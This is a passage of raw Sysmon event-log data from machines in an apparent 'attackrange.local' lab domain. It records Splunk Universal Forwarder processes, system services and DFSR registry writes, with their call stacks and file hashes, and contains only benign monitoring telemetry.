Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049340Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:50.226{466BC892-F50E-60EB-457D-00000000CF01}4256C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049339Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:50.028{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F480674BD6943732B1A5521E408FCF07,SHA256=659CAE03C0D7274FB19A3DBC7D5B63B80CC9A593720679CAEA4DDF5F1509AB2C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807853Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:51.558{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77C68932BB97FF203B4C6E7D1E7F7447,SHA256=40F37FA8675C797F61B71E17D65BF3A8115D28390434AFE63C87B8A1EE753BC7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049368Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:51.713{466BC892-F50F-60EB-477D-00000000CF01}96329608C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049367Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:51.435{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F50F-60EB-477D-00000000CF01}9632C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049366Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:51.435{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049365Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:51.435{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049364Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:51.435{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049363Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:51.435{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049362Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:51.435{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F50F-60EB-477D-00000000CF01}9632C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049361Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:51.435{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F50F-60EB-477D-00000000CF01}9632C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049360Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:51.431{466BC892-F50F-60EB-477D-00000000CF01}9632C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049359Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:51.233{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D5AD640565C263DE236F2B2B58EEB313,SHA256=32F40BC43C4CEA6101F4A3ADDE826717D50164EEEFCC4CC3409845713D6CDF4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049358Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:51.232{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0EEEE864BF3E251A4C7EE1FF5B035DB9,SHA256=6982675ACB408A9A8819C0AFC82D8B192159777C8B7196080A398A058D8CDB60,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049357Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:51.181{466BC892-F50E-60EB-467D-00000000CF01}81564920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049356Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:51.047{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74B2876505A575868ECEFDFE8C797851,SHA256=BC6F3F0EE540FDBE09B1FF809A1BC98F903AA8BBFBDAA6D22041DB635A589316,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807854Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:52.558{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=442998CE633F14D1D07280ED1292F116,SHA256=74315C968983D0861BA7C05D7B3D71DA94B39889CE5C8144BD1A95FD6EA4C2F0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049390Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:52.914{466BC892-F510-60EB-497D-00000000CF01}47326524C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049389Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:52.651{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F510-60EB-497D-00000000CF01}4732C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049388Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:52.651{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F510-60EB-497D-00000000CF01}4732C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049387Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:52.651{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F510-60EB-497D-00000000CF01}4732C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049386Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:52.651{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049385Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:52.651{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049384Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:52.651{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049383Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:52.651{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049382Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:52.615{466BC892-F510-60EB-497D-00000000CF01}4732C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049381Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:52.467{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D5AD640565C263DE236F2B2B58EEB313,SHA256=32F40BC43C4CEA6101F4A3ADDE826717D50164EEEFCC4CC3409845713D6CDF4B,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001049380Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:53:52.335{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\DFD6B7A8-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_DFD6B7A8-0000-0000-0000-100000000000.XML 13241300x80000000000000001049379Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:53:52.333{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\6C48E9CC-B771-47F3-A036-36AE114D8798\Config SourceDWORD (0x00000001) 13241300x80000000000000001049378Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:53:52.333{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\6C48E9CC-B771-47F3-A036-36AE114D8798\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_6C48E9CC-B771-47F3-A036-36AE114D8798.XML 10341000x80000000000000001049377Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:52.114{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F510-60EB-487D-00000000CF01}9312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049376Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:52.114{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049375Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:52.114{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNE